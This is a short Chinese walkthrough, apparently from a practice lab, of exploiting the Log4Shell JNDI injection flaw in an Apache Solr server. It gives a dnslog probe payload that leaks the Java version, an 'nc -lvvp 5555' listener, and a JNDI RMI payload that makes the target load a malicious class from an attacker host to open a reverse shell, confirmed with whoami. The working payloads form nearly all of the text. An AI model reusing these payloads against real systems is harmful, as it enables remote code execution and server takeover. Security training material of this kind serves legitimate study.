1，打开环境后访问该ip

2，打开dnslog.cn，获取一个域名，我们这里是2bfvl6.dnslog.cn

3，访问http://47.122.51.245:8983/solr/admin/coresaction=${jndi:ldap://${sys:java.version}.2bfvl6.dnslog.cn}

4，返回dnslog.cn查看是否有回显

5，反弹Shell

6，再打开一个宝塔进行监听

nc -lvvp 5555

7，访问http://47.122.51.245:8983/solr/admin/coresaction=${jndi:rmi://45.122.51.245:1099/5ltonm}可以看到⽹⻚被重定向到了我们的恶意类⽹址，回到宝塔查看

8，通过whoami来获得服务器权限